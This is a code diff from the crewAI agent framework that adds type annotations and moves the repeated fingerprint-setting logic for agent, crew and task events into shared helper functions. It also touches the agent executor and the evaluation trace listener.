if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
|
||||
self.source_fingerprint = self.agent.fingerprint.uuid_str
|
||||
self.source_type = "agent"
|
||||
if (
|
||||
hasattr(self.agent.fingerprint, "metadata")
|
||||
and self.agent.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.agent.fingerprint.metadata
|
||||
_set_agent_fingerprint(self, self.agent)
|
||||
return self
|
||||
|
||||
|
||||
@@ -49,16 +43,9 @@ class AgentExecutionCompletedEvent(BaseEvent):
|
||||
model_config = ConfigDict(arbitrary_types_allowed=True)
|
||||
|
||||
@model_validator(mode="after")
|
||||
def set_fingerprint_data(self):
|
||||
def set_fingerprint_data(self) -> Self:
|
||||
"""Set fingerprint data from the agent if available."""
|
||||
if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
|
||||
self.source_fingerprint = self.agent.fingerprint.uuid_str
|
||||
self.source_type = "agent"
|
||||
if (
|
||||
hasattr(self.agent.fingerprint, "metadata")
|
||||
and self.agent.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.agent.fingerprint.metadata
|
||||
_set_agent_fingerprint(self, self.agent)
|
||||
return self
|
||||
|
||||
|
||||
@@ -73,16 +60,9 @@ class AgentExecutionErrorEvent(BaseEvent):
|
||||
model_config = ConfigDict(arbitrary_types_allowed=True)
|
||||
|
||||
@model_validator(mode="after")
|
||||
def set_fingerprint_data(self):
|
||||
def set_fingerprint_data(self) -> Self:
|
||||
"""Set fingerprint data from the agent if available."""
|
||||
if hasattr(self.agent, "fingerprint") and self.agent.fingerprint:
|
||||
self.source_fingerprint = self.agent.fingerprint.uuid_str
|
||||
self.source_type = "agent"
|
||||
if (
|
||||
hasattr(self.agent.fingerprint, "metadata")
|
||||
and self.agent.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.agent.fingerprint.metadata
|
||||
_set_agent_fingerprint(self, self.agent)
|
||||
return self
|
||||
|
||||
|
||||
@@ -140,3 +120,13 @@ class AgentEvaluationFailedEvent(BaseEvent):
|
||||
iteration: int
|
||||
error: str
|
||||
type: str = "agent_evaluation_failed"
|
||||
|
||||
|
||||
def _set_agent_fingerprint(event: BaseEvent, agent: BaseAgent) -> None:
|
||||
"""Set fingerprint data on an event from an agent object."""
|
||||
fp = agent.security_config.fingerprint
|
||||
if fp is not None:
|
||||
event.source_fingerprint = fp.uuid_str
|
||||
event.source_type = "agent"
|
||||
if fp.metadata:
|
||||
event.fingerprint_metadata = fp.metadata
|
||||
|
||||
@@ -15,21 +15,18 @@ class CrewBaseEvent(BaseEvent):
|
||||
crew_name: str | None
|
||||
crew: Crew | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
self.set_crew_fingerprint()
|
||||
self._set_crew_fingerprint()
|
||||
|
||||
def set_crew_fingerprint(self) -> None:
|
||||
if self.crew and hasattr(self.crew, "fingerprint") and self.crew.fingerprint:
|
||||
def _set_crew_fingerprint(self) -> None:
|
||||
if self.crew is not None and self.crew.fingerprint:
|
||||
self.source_fingerprint = self.crew.fingerprint.uuid_str
|
||||
self.source_type = "crew"
|
||||
if (
|
||||
hasattr(self.crew.fingerprint, "metadata")
|
||||
and self.crew.fingerprint.metadata
|
||||
):
|
||||
if self.crew.fingerprint.metadata:
|
||||
self.fingerprint_metadata = self.crew.fingerprint.metadata
|
||||
|
||||
def to_json(self, exclude: set[str] | None = None):
|
||||
def to_json(self, exclude: set[str] | None = None) -> Any:
|
||||
if exclude is None:
|
||||
exclude = set()
|
||||
exclude.add("crew")
|
||||
|
||||
@@ -11,7 +11,7 @@ class KnowledgeEventBase(BaseEvent):
|
||||
agent_role: str | None = None
|
||||
agent_id: str | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
self._set_agent_params(data)
|
||||
self._set_task_params(data)
|
||||
|
||||
@@ -13,7 +13,7 @@ class LLMGuardrailBaseEvent(BaseEvent):
|
||||
agent_role: str | None = None
|
||||
agent_id: str | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
self._set_agent_params(data)
|
||||
self._set_task_params(data)
|
||||
@@ -28,10 +28,10 @@ class LLMGuardrailStartedEvent(LLMGuardrailBaseEvent):
|
||||
"""
|
||||
|
||||
type: str = "llm_guardrail_started"
|
||||
guardrail: str | Callable
|
||||
guardrail: str | Callable[..., Any]
|
||||
retry_count: int
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
from crewai.tasks.hallucination_guardrail import HallucinationGuardrail
|
||||
from crewai.tasks.llm_guardrail import LLMGuardrail
|
||||
|
||||
@@ -39,7 +39,7 @@ class LLMGuardrailStartedEvent(LLMGuardrailBaseEvent):
|
||||
|
||||
if isinstance(self.guardrail, (LLMGuardrail, HallucinationGuardrail)):
|
||||
self.guardrail = self.guardrail.description.strip()
|
||||
elif isinstance(self.guardrail, Callable):
|
||||
elif callable(self.guardrail):
|
||||
self.guardrail = getsource(self.guardrail).strip()
|
||||
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@ class MCPEvent(BaseEvent):
|
||||
from_agent: Any | None = None
|
||||
from_task: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
self._set_agent_params(data)
|
||||
self._set_task_params(data)
|
||||
|
||||
@@ -15,7 +15,7 @@ class ReasoningEvent(BaseEvent):
|
||||
agent_id: str | None = None
|
||||
from_agent: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
self._set_task_params(data)
|
||||
self._set_agent_params(data)
|
||||
|
||||
@@ -4,6 +4,15 @@ from crewai.events.base_events import BaseEvent
|
||||
from crewai.tasks.task_output import TaskOutput
|
||||
|
||||
|
||||
def _set_task_fingerprint(event: BaseEvent, task: Any) -> None:
|
||||
"""Set fingerprint data on an event from a task object."""
|
||||
if task is not None and task.fingerprint:
|
||||
event.source_fingerprint = task.fingerprint.uuid_str
|
||||
event.source_type = "task"
|
||||
if task.fingerprint.metadata:
|
||||
event.fingerprint_metadata = task.fingerprint.metadata
|
||||
|
||||
|
||||
class TaskStartedEvent(BaseEvent):
|
||||
"""Event emitted when a task starts"""
|
||||
|
||||
@@ -11,17 +20,9 @@ class TaskStartedEvent(BaseEvent):
|
||||
context: str | None
|
||||
task: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
# Set fingerprint data from the task
|
||||
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
|
||||
self.source_fingerprint = self.task.fingerprint.uuid_str
|
||||
self.source_type = "task"
|
||||
if (
|
||||
hasattr(self.task.fingerprint, "metadata")
|
||||
and self.task.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.task.fingerprint.metadata
|
||||
_set_task_fingerprint(self, self.task)
|
||||
|
||||
|
||||
class TaskCompletedEvent(BaseEvent):
|
||||
@@ -31,17 +32,9 @@ class TaskCompletedEvent(BaseEvent):
|
||||
type: str = "task_completed"
|
||||
task: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
# Set fingerprint data from the task
|
||||
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
|
||||
self.source_fingerprint = self.task.fingerprint.uuid_str
|
||||
self.source_type = "task"
|
||||
if (
|
||||
hasattr(self.task.fingerprint, "metadata")
|
||||
and self.task.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.task.fingerprint.metadata
|
||||
_set_task_fingerprint(self, self.task)
|
||||
|
||||
|
||||
class TaskFailedEvent(BaseEvent):
|
||||
@@ -51,17 +44,9 @@ class TaskFailedEvent(BaseEvent):
|
||||
type: str = "task_failed"
|
||||
task: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
# Set fingerprint data from the task
|
||||
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
|
||||
self.source_fingerprint = self.task.fingerprint.uuid_str
|
||||
self.source_type = "task"
|
||||
if (
|
||||
hasattr(self.task.fingerprint, "metadata")
|
||||
and self.task.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.task.fingerprint.metadata
|
||||
_set_task_fingerprint(self, self.task)
|
||||
|
||||
|
||||
class TaskEvaluationEvent(BaseEvent):
|
||||
@@ -71,14 +56,6 @@ class TaskEvaluationEvent(BaseEvent):
|
||||
evaluation_type: str
|
||||
task: Any | None = None
|
||||
|
||||
def __init__(self, **data):
|
||||
def __init__(self, **data: Any) -> None:
|
||||
super().__init__(**data)
|
||||
# Set fingerprint data from the task
|
||||
if hasattr(self.task, "fingerprint") and self.task.fingerprint:
|
||||
self.source_fingerprint = self.task.fingerprint.uuid_str
|
||||
self.source_type = "task"
|
||||
if (
|
||||
hasattr(self.task.fingerprint, "metadata")
|
||||
and self.task.fingerprint.metadata
|
||||
):
|
||||
self.fingerprint_metadata = self.task.fingerprint.metadata
|
||||
_set_task_fingerprint(self, self.task)
|
||||
|
||||
@@ -8,7 +8,7 @@ from datetime import datetime
|
||||
import inspect
|
||||
import json
|
||||
import threading
|
||||
from typing import TYPE_CHECKING, Any, Literal, cast
|
||||
from typing import TYPE_CHECKING, Any, Literal, TypeVar, cast
|
||||
from uuid import uuid4
|
||||
|
||||
from pydantic import BaseModel, Field, GetCoreSchemaHandler
|
||||
@@ -22,7 +22,11 @@ from crewai.agents.parser import (
|
||||
AgentFinish,
|
||||
OutputParserError,
|
||||
)
|
||||
from crewai.core.providers.human_input import get_provider
|
||||
from crewai.core.providers.human_input import (
|
||||
AsyncExecutorContext,
|
||||
ExecutorContext,
|
||||
get_provider,
|
||||
)
|
||||
from crewai.events.event_bus import crewai_event_bus
|
||||
from crewai.events.listeners.tracing.utils import (
|
||||
is_tracing_enabled_in_context,
|
||||
@@ -89,7 +93,7 @@ from crewai.utilities.planning_types import (
|
||||
TodoList,
|
||||
)
|
||||
from crewai.utilities.printer import Printer
|
||||
from crewai.utilities.step_execution_context import StepExecutionContext
|
||||
from crewai.utilities.step_execution_context import StepExecutionContext, StepResult
|
||||
from crewai.utilities.string_utils import sanitize_tool_name
|
||||
from crewai.utilities.tool_utils import execute_tool_and_check_finality
|
||||
from crewai.utilities.training_handler import CrewTrainingHandler
|
||||
@@ -105,6 +109,8 @@ if TYPE_CHECKING:
|
||||
from crewai.tools.tool_types import ToolResult
|
||||
from crewai.utilities.prompts import StandardPromptResult, SystemPromptResult
|
||||
|
||||
_RouteT = TypeVar("_RouteT", bound=str)
|
||||
|
||||
|
||||
class AgentExecutorState(BaseModel):
|
||||
"""Structured state for agent executor flow.
|
||||
@@ -446,29 +452,29 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
step failures reliably trigger replanning rather than being
|
||||
silently ignored.
|
||||
"""
|
||||
config = getattr(self.agent, "planning_config", None)
|
||||
if config is not None and hasattr(config, "reasoning_effort"):
|
||||
config = self.agent.planning_config
|
||||
if config is not None:
|
||||
return config.reasoning_effort
|
||||
return "medium"
|
||||
|
||||
def _get_max_replans(self) -> int:
|
||||
"""Get max replans from planning config or default to 3."""
|
||||
config = getattr(self.agent, "planning_config", None)
|
||||
if config is not None and hasattr(config, "max_replans"):
|
||||
config = self.agent.planning_config
|
||||
if config is not None:
|
||||
return config.max_replans
|
||||
return 3
|
||||
|
||||
def _get_max_step_iterations(self) -> int:
|
||||
"""Get max step iterations from planning config or default to 15."""
|
||||
config = getattr(self.agent, "planning_config", None)
|
||||
if config is not None and hasattr(config, "max_step_iterations"):
|
||||
config = self.agent.planning_config
|
||||
if config is not None:
|
||||
return config.max_step_iterations
|
||||
return 15
|
||||
|
||||
def _get_step_timeout(self) -> int | None:
|
||||
"""Get per-step timeout from planning config or default to None."""
|
||||
config = getattr(self.agent, "planning_config", None)
|
||||
if config is not None and hasattr(config, "step_timeout"):
|
||||
config = self.agent.planning_config
|
||||
if config is not None:
|
||||
return config.step_timeout
|
||||
return None
|
||||
|
||||
@@ -1130,9 +1136,9 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
# Process results: store on todos and log, then observe each.
|
||||
# asyncio.gather preserves input order, so zip gives us the exact
|
||||
# todo ↔ result (or exception) mapping.
|
||||
step_results: list[tuple[TodoItem, object]] = []
|
||||
step_results: list[tuple[TodoItem, StepResult]] = []
|
||||
for todo, item in zip(ready, gathered, strict=True):
|
||||
if isinstance(item, Exception):
|
||||
if isinstance(item, BaseException):
|
||||
error_msg = f"Error: {item!s}"
|
||||
todo.result = error_msg
|
||||
self.state.todos.mark_failed(todo.step_number, result=error_msg)
|
||||
@@ -1143,31 +1149,34 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
)
|
||||
else:
|
||||
_returned_todo, result = item
|
||||
todo.result = result.result
|
||||
step_result = cast(StepResult, result)
|
||||
todo.result = step_result.result
|
||||
|
||||
self.state.execution_log.append(
|
||||
{
|
||||
"type": "step_execution",
|
||||
"step_number": todo.step_number,
|
||||
"success": result.success,
|
||||
"result_preview": result.result[:200] if result.result else "",
|
||||
"error": result.error,
|
||||
"tool_calls": result.tool_calls_made,
|
||||
"execution_time": result.execution_time,
|
||||
"success": step_result.success,
|
||||
"result_preview": step_result.result[:200]
|
||||
if step_result.result
|
||||
else "",
|
||||
"error": step_result.error,
|
||||
"tool_calls": step_result.tool_calls_made,
|
||||
"execution_time": step_result.execution_time,
|
||||
}
|
||||
)
|
||||
|
||||
if self.agent.verbose:
|
||||
status = "success" if result.success else "failed"
|
||||
status = "success" if step_result.success else "failed"
|
||||
self._printer.print(
|
||||
content=(
|
||||
f"[Execute] Step {todo.step_number} {status} "
|
||||
f"({result.execution_time:.1f}s, "
|
||||
f"{len(result.tool_calls_made)} tool calls)"
|
||||
f"({step_result.execution_time:.1f}s, "
|
||||
f"{len(step_result.tool_calls_made)} tool calls)"
|
||||
),
|
||||
color="green" if result.success else "red",
|
||||
color="green" if step_result.success else "red",
|
||||
)
|
||||
step_results.append((todo, result))
|
||||
step_results.append((todo, step_result))
|
||||
|
||||
# Observe each completed step sequentially (observation updates shared state)
|
||||
effort = self._get_reasoning_effort()
|
||||
@@ -1431,8 +1440,8 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
raise
|
||||
|
||||
def _route_finish_with_todos(
|
||||
self, default_route: str
|
||||
) -> Literal["native_finished", "agent_finished", "todo_satisfied"]:
|
||||
self, default_route: _RouteT
|
||||
) -> _RouteT | Literal["todo_satisfied"]:
|
||||
"""Helper to route finish events, checking for pending todos first.
|
||||
|
||||
If there are pending todos, route to todo_satisfied instead of the
|
||||
@@ -1448,7 +1457,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
current_todo = self.state.todos.current_todo
|
||||
if current_todo:
|
||||
return "todo_satisfied"
|
||||
return default_route # type: ignore[return-value]
|
||||
return default_route
|
||||
|
||||
@router(call_llm_and_parse)
|
||||
def route_by_answer_type(
|
||||
@@ -2063,7 +2072,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
elif not self.state.current_answer and self.state.messages:
|
||||
# For native tools, results are in the message history as 'tool' roles
|
||||
# We take the content of the most recent tool results
|
||||
tool_results = []
|
||||
tool_results: list[str] = []
|
||||
for msg in reversed(self.state.messages):
|
||||
if msg.get("role") == "tool":
|
||||
tool_results.insert(0, str(msg.get("content", "")))
|
||||
@@ -3003,7 +3012,7 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
Final answer after feedback.
|
||||
"""
|
||||
provider = get_provider()
|
||||
return provider.handle_feedback(formatted_answer, self)
|
||||
return provider.handle_feedback(formatted_answer, cast("ExecutorContext", self))
|
||||
|
||||
async def _ahandle_human_feedback(
|
||||
self, formatted_answer: AgentFinish
|
||||
@@ -3017,7 +3026,9 @@ class AgentExecutor(Flow[AgentExecutorState], CrewAgentExecutorMixin):
|
||||
Final answer after feedback.
|
||||
"""
|
||||
provider = get_provider()
|
||||
return await provider.handle_feedback_async(formatted_answer, self)
|
||||
return await provider.handle_feedback_async(
|
||||
formatted_answer, cast("AsyncExecutorContext", self)
|
||||
)
|
||||
|
||||
def _is_training_mode(self) -> bool:
|
||||
"""Check if training mode is active.
|
||||
|
||||
@@ -37,11 +37,11 @@ class ExecutionState:
|
||||
current_agent_id: str | None = None
|
||||
current_task_id: str | None = None
|
||||
|
||||
def __init__(self):
|
||||
self.traces = {}
|
||||
self.iteration = 1
|
||||
self.iterations_results = {}
|
||||
self.agent_evaluators = {}
|
||||
def __init__(self) -> None:
|
||||
self.traces: dict[str, Any] = {}
|
||||
self.iteration: int = 1
|
||||
self.iterations_results: dict[int, dict[str, list[AgentEvaluationResult]]] = {}
|
||||
self.agent_evaluators: dict[str, Sequence[BaseEvaluator] | None] = {}
|
||||
|
||||
|
||||
class AgentEvaluator:
|
||||
@@ -295,7 +295,7 @@ class AgentEvaluator:
|
||||
|
||||
def emit_evaluation_started_event(
|
||||
self, agent_role: str, agent_id: str, task_id: str | None = None
|
||||
):
|
||||
) -> None:
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
AgentEvaluationStartedEvent(
|
||||
@@ -313,7 +313,7 @@ class AgentEvaluator:
|
||||
task_id: str | None = None,
|
||||
metric_category: MetricCategory | None = None,
|
||||
score: EvaluationScore | None = None,
|
||||
):
|
||||
) -> None:
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
AgentEvaluationCompletedEvent(
|
||||
@@ -328,7 +328,7 @@ class AgentEvaluator:
|
||||
|
||||
def emit_evaluation_failed_event(
|
||||
self, agent_role: str, agent_id: str, error: str, task_id: str | None = None
|
||||
):
|
||||
) -> None:
|
||||
crewai_event_bus.emit(
|
||||
self,
|
||||
AgentEvaluationFailedEvent(
|
||||
@@ -341,7 +341,9 @@ class AgentEvaluator:
|
||||
)
|
||||
|
||||
|
||||
def create_default_evaluator(agents: list[Agent] | list[BaseAgent], llm: None = None):
|
||||
def create_default_evaluator(
|
||||
agents: list[Agent] | list[BaseAgent], llm: None = None
|
||||
) -> AgentEvaluator:
|
||||
from crewai.experimental.evaluation import (
|
||||
GoalAlignmentEvaluator,
|
||||
ParameterExtractionEvaluator,
|
||||
|
||||
@@ -8,7 +8,7 @@ from typing import TYPE_CHECKING, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from crewai.agents.agent_builder.base_agent import BaseAgent
|
||||
from crewai.llm import BaseLLM
|
||||
from crewai.llms.base_llm import BaseLLM
|
||||
from crewai.task import Task
|
||||
from crewai.utilities.llm_utils import create_llm
|
||||
|
||||
@@ -25,7 +25,7 @@ class MetricCategory(enum.Enum):
|
||||
PARAMETER_EXTRACTION = "parameter_extraction"
|
||||
TOOL_INVOCATION = "tool_invocation"
|
||||
|
||||
def title(self):
|
||||
def title(self) -> str:
|
||||
return self.value.replace("_", " ").title()
|
||||
|
||||
|
||||
|
||||
@@ -18,12 +18,12 @@ from crewai.utilities.types import LLMMessage
|
||||
|
||||
|
||||
class EvaluationDisplayFormatter:
|
||||
def __init__(self):
|
||||
def __init__(self) -> None:
|
||||
self.console_formatter = ConsoleFormatter()
|
||||
|
||||
def display_evaluation_with_feedback(
|
||||
self, iterations_results: dict[int, dict[str, list[Any]]]
|
||||
):
|
||||
) -> None:
|
||||
if not iterations_results:
|
||||
self.console_formatter.print(
|
||||
"[yellow]No evaluation results to display[/yellow]"
|
||||
@@ -103,7 +103,7 @@ class EvaluationDisplayFormatter:
|
||||
def display_summary_results(
|
||||
self,
|
||||
iterations_results: dict[int, dict[str, list[AgentEvaluationResult]]],
|
||||
):
|
||||
) -> None:
|
||||
if not iterations_results:
|
||||
self.console_formatter.print(
|
||||
"[yellow]No evaluation results to display[/yellow]"
|
||||
|
||||
@@ -1,6 +1,11 @@
|
||||
"""Event listener for collecting execution traces for evaluation."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from collections.abc import Sequence
|
||||
from datetime import datetime
|
||||
from typing import Any
|
||||
from uuid import UUID
|
||||
|
||||
from crewai.agents.agent_builder.base_agent import BaseAgent
|
||||
from crewai.events.base_event_listener import BaseEventListener
|
||||
@@ -30,47 +35,63 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
retrievals, and final output - all for use in agent evaluation.
|
||||
"""
|
||||
|
||||
_instance = None
|
||||
_instance: EvaluationTraceCallback | None = None
|
||||
_initialized: bool = False
|
||||
|
||||
def __new__(cls):
|
||||
def __new__(cls) -> EvaluationTraceCallback:
|
||||
"""Create or return the singleton instance."""
|
||||
if cls._instance is None:
|
||||
cls._instance = super().__new__(cls)
|
||||
cls._instance._initialized = False
|
||||
return cls._instance
|
||||
|
||||
def __init__(self):
|
||||
if not hasattr(self, "_initialized") or not self._initialized:
|
||||
def __init__(self) -> None:
|
||||
"""Initialize the evaluation trace callback."""
|
||||
if not self._initialized:
|
||||
super().__init__()
|
||||
self.traces = {}
|
||||
self.current_agent_id = None
|
||||
self.current_task_id = None
|
||||
self.traces: dict[str, Any] = {}
|
||||
self.current_agent_id: UUID | str | None = None
|
||||
self.current_task_id: UUID | str | None = None
|
||||
self.current_llm_call: dict[str, Any] = {}
|
||||
self._initialized = True
|
||||
|
||||
def setup_listeners(self, event_bus: CrewAIEventsBus):
|
||||
def setup_listeners(self, event_bus: CrewAIEventsBus) -> None:
|
||||
"""Set up event listeners on the event bus.
|
||||
|
||||
Args:
|
||||
event_bus: The event bus to register listeners on.
|
||||
"""
|
||||
|
||||
@event_bus.on(AgentExecutionStartedEvent)
|
||||
def on_agent_started(source, event: AgentExecutionStartedEvent):
|
||||
def on_agent_started(source: Any, event: AgentExecutionStartedEvent) -> None:
|
||||
self.on_agent_start(event.agent, event.task)
|
||||
|
||||
@event_bus.on(LiteAgentExecutionStartedEvent)
|
||||
def on_lite_agent_started(source, event: LiteAgentExecutionStartedEvent):
|
||||
def on_lite_agent_started(
|
||||
source: Any, event: LiteAgentExecutionStartedEvent
|
||||
) -> None:
|
||||
self.on_lite_agent_start(event.agent_info)
|
||||
|
||||
@event_bus.on(AgentExecutionCompletedEvent)
|
||||
def on_agent_completed(source, event: AgentExecutionCompletedEvent):
|
||||
def on_agent_completed(
|
||||
source: Any, event: AgentExecutionCompletedEvent
|
||||
) -> None:
|
||||
self.on_agent_finish(event.agent, event.task, event.output)
|
||||
|
||||
@event_bus.on(LiteAgentExecutionCompletedEvent)
|
||||
def on_lite_agent_completed(source, event: LiteAgentExecutionCompletedEvent):
|
||||
def on_lite_agent_completed(
|
||||
source: Any, event: LiteAgentExecutionCompletedEvent
|
||||
) -> None:
|
||||
self.on_lite_agent_finish(event.output)
|
||||
|
||||
@event_bus.on(ToolUsageFinishedEvent)
|
||||
def on_tool_completed(source, event: ToolUsageFinishedEvent):
|
||||
def on_tool_completed(source: Any, event: ToolUsageFinishedEvent) -> None:
|
||||
self.on_tool_use(
|
||||
event.tool_name, event.tool_args, event.output, success=True
|
||||
)
|
||||
|
||||
@event_bus.on(ToolUsageErrorEvent)
|
||||
def on_tool_usage_error(source, event: ToolUsageErrorEvent):
|
||||
def on_tool_usage_error(source: Any, event: ToolUsageErrorEvent) -> None:
|
||||
self.on_tool_use(
|
||||
event.tool_name,
|
||||
event.tool_args,
|
||||
@@ -80,7 +101,9 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
)
|
||||
|
||||
@event_bus.on(ToolExecutionErrorEvent)
|
||||
def on_tool_execution_error(source, event: ToolExecutionErrorEvent):
|
||||
def on_tool_execution_error(
|
||||
source: Any, event: ToolExecutionErrorEvent
|
||||
) -> None:
|
||||
self.on_tool_use(
|
||||
event.tool_name,
|
||||
event.tool_args,
|
||||
@@ -90,7 +113,9 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
)
|
||||
|
||||
@event_bus.on(ToolSelectionErrorEvent)
|
||||
def on_tool_selection_error(source, event: ToolSelectionErrorEvent):
|
||||
def on_tool_selection_error(
|
||||
source: Any, event: ToolSelectionErrorEvent
|
||||
) -> None:
|
||||
self.on_tool_use(
|
||||
event.tool_name,
|
||||
event.tool_args,
|
||||
@@ -100,7 +125,9 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
)
|
||||
|
||||
@event_bus.on(ToolValidateInputErrorEvent)
|
||||
def on_tool_validate_input_error(source, event: ToolValidateInputErrorEvent):
|
||||
def on_tool_validate_input_error(
|
||||
source: Any, event: ToolValidateInputErrorEvent
|
||||
) -> None:
|
||||
self.on_tool_use(
|
||||
event.tool_name,
|
||||
event.tool_args,
|
||||
@@ -110,14 +137,19 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
)
|
||||
|
||||
@event_bus.on(LLMCallStartedEvent)
|
||||
def on_llm_call_started(source, event: LLMCallStartedEvent):
|
||||
def on_llm_call_started(source: Any, event: LLMCallStartedEvent) -> None:
|
||||
self.on_llm_call_start(event.messages, event.tools)
|
||||
|
||||
@event_bus.on(LLMCallCompletedEvent)
|
||||
def on_llm_call_completed(source, event: LLMCallCompletedEvent):
|
||||
def on_llm_call_completed(source: Any, event: LLMCallCompletedEvent) -> None:
|
||||
self.on_llm_call_end(event.messages, event.response)
|
||||
|
||||
def on_lite_agent_start(self, agent_info: dict[str, Any]):
|
||||
def on_lite_agent_start(self, agent_info: dict[str, Any]) -> None:
|
||||
"""Handle a lite agent execution start event.
|
||||
|
||||
Args:
|
||||
agent_info: Dictionary containing agent information.
|
||||
"""
|
||||
self.current_agent_id = agent_info["id"]
|
||||
self.current_task_id = "lite_task"
|
||||
|
||||
@@ -132,10 +164,22 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
final_output=None,
|
||||
)
|
||||
|
||||
def _init_trace(self, trace_key: str, **kwargs: Any):
|
||||
def _init_trace(self, trace_key: str, **kwargs: Any) -> None:
|
||||
"""Initialize a trace entry.
|
||||
|
||||
Args:
|
||||
trace_key: The key to store the trace under.
|
||||
**kwargs: Trace metadata to store.
|
||||
"""
|
||||
self.traces[trace_key] = kwargs
|
||||
|
||||
def on_agent_start(self, agent: BaseAgent, task: Task):
|
||||
def on_agent_start(self, agent: BaseAgent, task: Task) -> None:
|
||||
"""Handle an agent execution start event.
|
||||
|
||||
Args:
|
||||
agent: The agent that started execution.
|
||||
task: The task being executed.
|
||||
"""
|
||||
self.current_agent_id = agent.id
|
||||
self.current_task_id = task.id
|
||||
|
||||
@@ -150,7 +194,14 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
final_output=None,
|
||||
)
|
||||
|
||||
def on_agent_finish(self, agent: BaseAgent, task: Task, output: Any):
|
||||
def on_agent_finish(self, agent: BaseAgent, task: Task, output: Any) -> None:
|
||||
"""Handle an agent execution completion event.
|
||||
|
||||
Args:
|
||||
agent: The agent that finished execution.
|
||||
task: The task that was executed.
|
||||
output: The agent's output.
|
||||
"""
|
||||
trace_key = f"{agent.id}_{task.id}"
|
||||
if trace_key in self.traces:
|
||||
self.traces[trace_key]["final_output"] = output
|
||||
@@ -158,11 +209,17 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
|
||||
self._reset_current()
|
||||
|
||||
def _reset_current(self):
|
||||
def _reset_current(self) -> None:
|
||||
"""Reset the current agent and task tracking state."""
|
||||
self.current_agent_id = None
|
||||
self.current_task_id = None
|
||||
|
||||
def on_lite_agent_finish(self, output: Any):
|
||||
def on_lite_agent_finish(self, output: Any) -> None:
|
||||
"""Handle a lite agent execution completion event.
|
||||
|
||||
Args:
|
||||
output: The agent's output.
|
||||
"""
|
||||
trace_key = f"{self.current_agent_id}_lite_task"
|
||||
if trace_key in self.traces:
|
||||
self.traces[trace_key]["final_output"] = output
|
||||
@@ -177,13 +234,22 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
result: Any,
|
||||
success: bool = True,
|
||||
error_type: str | None = None,
|
||||
):
|
||||
) -> None:
|
||||
"""Record a tool usage event in the current trace.
|
||||
|
||||
Args:
|
||||
tool_name: Name of the tool used.
|
||||
tool_args: Arguments passed to the tool.
|
||||
result: The tool's output or error message.
|
||||
success: Whether the tool call succeeded.
|
||||
error_type: Type of error if the call failed.
|
||||
"""
|
||||
if not self.current_agent_id or not self.current_task_id:
|
||||
return
|
||||
|
||||
trace_key = f"{self.current_agent_id}_{self.current_task_id}"
|
||||
if trace_key in self.traces:
|
||||
tool_use = {
|
||||
tool_use: dict[str, Any] = {
|
||||
"tool": tool_name,
|
||||
"args": tool_args,
|
||||
"result": result,
|
||||
@@ -191,7 +257,6 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
"timestamp": datetime.now(),
|
||||
}
|
||||
|
||||
# Add error information if applicable
|
||||
if not success and error_type:
|
||||
tool_use["error"] = True
|
||||
tool_use["error_type"] = error_type
|
||||
@@ -202,7 +267,13 @@ class EvaluationTraceCallback(BaseEventListener):
|
||||
self,
|
||||
messages: str | Sequence[dict[str, Any]] | None,
|
||||
tools: Sequence[dict[str, Any]] | None = None,
|
||||
):
|
||||
) -> None:
|
||||
"""Record an LLM call start event.
|
||||
|
||||
Args:
|
||||
messages: The messages sent to the LLM.
|
||||
tools: Tool definitions provided to the LLM.
|
||||
"""
|
||||
if not self.current_agent_id or not self.current_task_id:
|
||||
return
|
||||
|
||||
